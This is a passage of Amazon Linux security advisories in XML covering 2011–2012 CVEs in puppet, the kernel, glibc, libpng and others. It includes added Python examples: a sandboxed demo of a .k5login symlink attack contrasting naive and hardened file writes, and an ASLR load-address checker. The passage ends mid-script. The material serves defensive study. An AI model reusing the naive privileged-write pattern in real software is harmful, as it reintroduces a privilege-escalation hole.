Multiple cross-site scripting (XSS) vulnerabilities in config.c in config.cgi in (1) Nagios 3.2.3 and (2) Icinga before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the expand parameter, as demonstrated by an (a) command action or a (b) hosts action.
709871:
CVE-2011-2179 nagios: XSS in configuration command expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2179" title="" id="CVE-2011-2179" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nagios-debuginfo" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-debuginfo-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios-devel" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-devel-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-common-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-common-3.3.1-3.4.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-devel-3.3.1-3.4.amzn1.x86_64.rpm</filename></package><package name="nagios" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-3.3.1-3.4.amzn1.x86_64.rpm</filename></package><package name="nagios-debuginfo" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-debuginfo-3.3.1-3.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-51</id><title>Amazon Linux - ALAS-2012-51: medium priority package update for cvs</title><issued date="2012-03-04 16:12:00" /><updated date="2014-09-14 15:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2012-0804:
A heap-based buffer overflow flaw was found in the way the CVS client handled responses from HTTP proxies. A malicious HTTP proxy could use this flaw to cause the CVS client to crash or, possibly, execute arbitrary code with the privileges of the user running the CVS client.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0804" title="" id="CVE-2012-0804" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0321.html" title="" id="RHSA-2012:0321" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cvs-debuginfo" version="1.11.23" release="11.6.amzn1" epoch="0" arch="i686"><filename>Packages/cvs-debuginfo-1.11.23-11.6.amzn1.i686.rpm</filename></package><package name="cvs" version="1.11.23" release="11.6.amzn1" epoch="0" arch="i686"><filename>Packages/cvs-1.11.23-11.6.amzn1.i686.rpm</filename></package><package name="cvs" version="1.11.23" release="11.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/cvs-1.11.23-11.6.amzn1.x86_64.rpm</filename></package><package name="cvs-debuginfo" version="1.11.23" release="11.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/cvs-debuginfo-1.11.23-11.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-52</id><title>Amazon Linux - ALAS-2012-52: medium priority package update for libxml2</title><issued date="2012-03-04 16:12:00" /><updated date="2014-09-14 15:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0841:
It was found that the hashing routine used by libxml2 arrays was susceptible to predictable hash collisions. Sending a specially-crafted message to an XML service could result in longer processing time, which could lead to a denial of service. To mitigate this issue, randomization has been added to the hashing function to reduce the chance of an attacker successfully causing intentional collisions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0841" title="" id="CVE-2012-0841" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0324.html" title="" id="RHSA-2012:0324" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-python" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.12.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libxml2-static-2.7.6-4.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-53</id><title>Amazon Linux - ALAS-2012-53: medium priority package update for puppet</title><issued date="2012-03-15 19:11:00" /><updated date="2014-09-14 15:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1054:
Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x before 2.0.3, when managing a user login file with the k5login resource type, allows local users to gain privileges via a symlink attack on .k5login.
791002:
CVE-2012-1054 Puppet 2.6.13 Klogin File Handling Issue
CVE-2012-1053:
The change_user method in the SUIDManager (lib/puppet/util/suidmanager.rb) in Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x before 2.0.3 does not properly manage group privileges, which allows local users to gain privileges via vectors related to (1) the change_user not dropping supplementary groups in certain conditions, (2) changes to the eguid without associated changes to the egid, or (3) the addition of the real gid to supplementary groups.
791001:
CVE-2012-1053 Puppet 2.6.13 group ID handling issues
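The k5login issue is the classic managed-file symlink race: a daemon running as root writes to a path inside a directory the user controls, and open() follows whatever link the user planted there. The block below is an added example, not Puppet's code or its actual patch: it contrasts a naive write with one that opens the path with O_NOFOLLOW and validates the descriptor it actually holds with fstat(), the two checks a practitioner wants on any root-written file in a user-owned directory. The temporary-directory scenario is constructed and runs unprivileged, so the "victim" file is simply one the user already owns.

```python
import os
import stat
import tempfile


def write_login_file_unsafe(path: str, content: str) -> None:
    """Naive managed-file write. open() follows symlinks, so if the user has
    replaced .k5login with a link to a root-owned file, that file is the one
    that gets rewritten with the user's chosen content."""
    with open(path, "w") as f:
        f.write(content)


def write_login_file_safe(path: str, content: str, owner_uid: int) -> None:
    """Hardened write. O_NOFOLLOW makes open() fail with ELOOP on a symlink at
    the final path component, and fstat() on the descriptor we hold (rather
    than stat() on the path, which would reopen the race) confirms it is a
    regular file owned by the user whose login file this is supposed to be."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o600)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise RuntimeError("%s is not a regular file" % path)
        if st.st_uid != owner_uid:
            raise RuntimeError("%s is owned by uid %d, expected uid %d"
                               % (path, st.st_uid, owner_uid))
        os.ftruncate(fd, 0)
        os.write(fd, content.encode())
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario in a throwaway directory: 'victim' stands in for a
    file the user must not be able to write, and '.k5login' is the symlink the
    user planted in their own home directory."""
    with tempfile.TemporaryDirectory() as home:
        victim = os.path.join(home, "victim")
        with open(victim, "w") as f:
            f.write("original\n")
        link = os.path.join(home, ".k5login")
        os.symlink(victim, link)
        payload = "attacker@EXAMPLE.COM\n"

        try:
            write_login_file_safe(link, payload, os.getuid())
            safe_refused = False
        except OSError:                 # ELOOP: refused to follow the symlink
            safe_refused = True
        with open(victim) as f:
            after_safe = f.read()

        write_login_file_unsafe(link, payload)
        with open(victim) as f:
            after_unsafe = f.read()

    return {"safe_refused": safe_refused, "after_safe": after_safe,
            "after_unsafe": after_unsafe}


if __name__ == "__main__":
    print(demo())
```

The hardened path refuses the link and leaves the target untouched; the naive path rewrites it. The group-handling issue in CVE-2012-1053 is a separate pattern worth checking in any code that switches users: supplementary groups must be cleared with setgroups() before setgid(), and both must happen before setuid(), since after setuid() the process no longer has the privilege to change its groups.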
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1053" title="" id="CVE-2012-1053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1054" title="" id="CVE-2012-1054" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet-server" version="2.6.14" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.6.14-1.5.amzn1.i686.rpm</filename></package><package name="puppet" version="2.6.14" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.6.14-1.5.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.14" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.6.14-1.5.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.6.14" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.6.14-1.5.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.6.14" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.6.14-1.5.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.6.14" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.6.14-1.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-54</id><title>Amazon Linux - ALAS-2012-54: medium priority package update for systemtap</title><issued date="2012-03-15 19:21:00" /><updated date="2014-09-14 15:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0875:
An invalid pointer read flaw was found in the way SystemTap handled malformed debugging information in DWARF format. When SystemTap unprivileged mode was enabled, an unprivileged user in the stapusr group could use this flaw to crash the system or, potentially, read arbitrary kernel memory. Additionally, a privileged user (root, or a member of the stapdev group) could trigger this flaw when tricked into instrumenting a specially-crafted ELF binary, even when unprivileged mode was not enabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0875" title="" id="CVE-2012-0875" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0376.html" title="" id="RHSA-2012:0376" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="systemtap-debuginfo" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-debuginfo-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-server" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-server-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-sdt-devel" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-sdt-devel-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-testsuite" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-testsuite-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-initscript" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-initscript-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-runtime" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-runtime-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-sdt-devel" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-sdt-devel-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-testsuite" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-testsuite-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-runtime" version="1.6" release="5.12.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/systemtap-runtime-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-debuginfo" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-debuginfo-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-server" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-server-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-initscript" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-initscript-1.6-5.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-55</id><title>Amazon Linux - ALAS-2012-55: medium priority package update for kernel</title><issued date="2012-03-16 10:53:00" /><updated date="2014-09-14 15:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0207:
* A divide-by-zero flaw was found in the Linux kernel's igmp_heard_query() function. An attacker able to send certain IGMP (Internet Group Management Protocol) packets to a target system could use this flaw to cause a denial of service.
CVE-2012-0045:
* A flaw was found in the way the Linux kernel's KVM hypervisor implementation emulated the syscall instruction for 32-bit guests. An unprivileged guest user could trigger this flaw to crash the guest.
CVE-2012-0038:
* A flaw was found in the way the Linux kernel's XFS file system implementation handled on-disk Access Control Lists (ACLs). A local, unprivileged user could use this flaw to cause a denial of service or escalate their privileges by mounting a specially-crafted disk.
CVE-2011-4622:
The create_pit_timer function in arch/x86/kvm/i8254.c in KVM 83, and possibly other versions, does not properly handle Programmable Interval Timer (PIT) interrupt requests (IRQs) when a virtual interrupt controller (irqchip) is not available, which allows local users to cause a denial of service (NULL pointer dereference) by starting a timer.
A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT (Programmable Interval Timer) IRQs (interrupt requests) when there was no virtual interrupt controller set up. A local, unprivileged user on the host, such as a member of the kvm group, could force this situation to occur, resulting in the host crashing.
CVE-2011-4611:
* The RHSA-2011:1530 kernel update introduced an integer overflow flaw in the Linux kernel. On PowerPC systems, a local, unprivileged user could use this flaw to cause a denial of service.
CVE-2011-4594:
* Two flaws were found in the way the Linux kernel's __sys_sendmsg() function, when invoked via the sendmmsg() system call, accessed user-space memory. A local, unprivileged user could use these flaws to cause a denial of service.
CVE-2011-4347:
It was found that the kvm_vm_ioctl_assign_device() function in the KVM (Kernel-based Virtual Machine) subsystem of a Linux kernel did not check if the user requesting device assignment was privileged or not. A local, unprivileged user on the host, such as a member of the kvm group, could assign unused PCI devices, or even devices that were in use and whose resources were not properly claimed by the respective drivers, which could result in the host crashing.
CVE-2011-4132:
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local, unprivileged user could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
CVE-2011-4081:
* Flaws in ghash_update() and ghash_final() could allow a local, unprivileged user to cause a denial of service.
CVE-2011-4077:
* A buffer overflow flaw was found in the way the Linux kernel's XFS file system implementation handled links with overly long path names. A local, unprivileged user could use this flaw to cause a denial of service or escalate their privileges by mounting a specially-crafted disk.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4077" title="" id="CVE-2011-4077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4081" title="" id="CVE-2011-4081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4132" title="" id="CVE-2011-4132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4347" title="" id="CVE-2011-4347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4594" title="" id="CVE-2011-4594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4611" title="" id="CVE-2011-4611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4622" title="" id="CVE-2011-4622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0038" title="" id="CVE-2012-0038" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0045" title="" id="CVE-2012-0045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0207" title="" id="CVE-2012-0207" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0350.html" title="" id="RHSA-2012:0350" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-107.1.39.amzn1.noarch.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package 
name="kernel-headers" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.39.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.39.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-56</id><title>Amazon Linux - ALAS-2012-56: medium priority package update for libpng</title><issued date="2012-03-23 14:13:00" /><updated date="2014-09-14 15:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3045:
Integer signedness error in pngrutil.c in libpng before 1.4.10beta01, as used in Google Chrome before 17.0.963.83 and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file, a different vulnerability than CVE-2011-3026.
A heap-based buffer overflow flaw was found in the way libpng processed compressed chunks in PNG image files. An attacker could create a specially-crafted PNG image file that, when opened, could cause an application using libpng to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3045" title="" id="CVE-2011-3045" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0407.html" title="" id="RHSA-2012:0407" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libpng-debuginfo" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng-devel" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.48" release="1.11.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.48-1.11.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.48-1.11.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.48-1.11.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.48-1.11.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.48" release="1.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.48-1.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-57</id><title>Amazon Linux - ALAS-2012-57: medium priority package update for glibc</title><issued date="2012-03-23 14:15:00" /><updated 
date="2014-09-14 15:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0864:
An integer overflow flaw was found in the implementation of the printf functions family. This could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864" title="" id="CVE-2012-0864" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0393.html" title="" id="RHSA-2012:0393" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-static" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.47.37.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.47.37.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.47.37.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nscd-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.47.37.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.47.37.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-58</id><title>Amazon Linux - ALAS-2012-58: medium priority package update for kernel</title><issued date="2012-03-23 14:18:00" /><updated date="2014-09-14 15:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1568:
804947:
CVE-2012-1568 kernel: execshield: predictable ascii armour base address
* It was found that when running a 32-bit binary that uses a large number of shared libraries, one of the libraries would always be loaded at a predictable address in memory. An attacker could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
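A quick way to check for this class of problem on a running host, as an added example rather than anything from the advisory: launch a fresh process several times and compare the load addresses in /proc/PID/maps. With ASLR working, every shared object moves between runs; an object whose base never changes is either a non-PIE main executable (expected, since those are linked at a fixed address) or the kind of predictable mapping described above. The maps samples in the block are constructed, libfixed.so is a hypothetical name, and the live probe only exercises the 32-bit case if the process it runs is itself a 32-bit binary.

```python
import subprocess


def parse_maps(text: str) -> dict:
    """Return {path: base address} for every file-backed mapping in
    /proc/PID/maps text, where base is the lowest start address seen for
    that path. A line looks like:
    7f3a1c000000-7f3a1c1b5000 r-xp 00000000 08:01 131 /lib64/libc.so.6"""
    bases = {}
    for line in text.splitlines():
        fields = line.split(None, 5)
        if len(fields) != 6 or not fields[5].startswith("/"):
            continue            # skip [stack], [heap], [vdso] and anonymous maps
        start = int(fields[0].split("-")[0], 16)
        path = fields[5]
        bases[path] = min(bases.get(path, start), start)
    return bases


def fixed_mappings(samples: list) -> dict:
    """Given maps text from independent runs, return {path: base} for the
    objects whose base address was identical in every run."""
    if 2 > len(samples):
        raise ValueError("at least two runs are needed to judge randomization")
    seen = {}
    for text in samples:
        for path, base in parse_maps(text).items():
            seen.setdefault(path, set()).add(base)
    return {path: bases.pop() for path, bases in seen.items() if len(bases) == 1}


def sample_live(runs: int = 8) -> list:
    """Live probe on a Linux host: each cat is a fresh process, so
    /proc/self/maps reflects a fresh set of load addresses."""
    return [subprocess.run(["cat", "/proc/self/maps"], capture_output=True,
                           text=True, check=True).stdout for _ in range(runs)]


# Constructed samples standing in for three runs of a 32-bit process: libc
# moves every time, the non-PIE executable stays put as expected, and the
# hypothetical libfixed.so is the predictable mapping we want flagged.
SAMPLE_RUNS = [
    """08048000-08052000 r-xp 00000000 08:01 1234 /bin/cat
00110000-00111000 r-xp 00000000 08:01 4321 /lib/libfixed.so
b7550000-b76a0000 r-xp 00000000 08:01 5678 /lib/libc-2.12.so
b76a0000-b76a2000 r--p 00150000 08:01 5678 /lib/libc-2.12.so
b76a4000-b76a5000 rw-p 00000000 00:00 0
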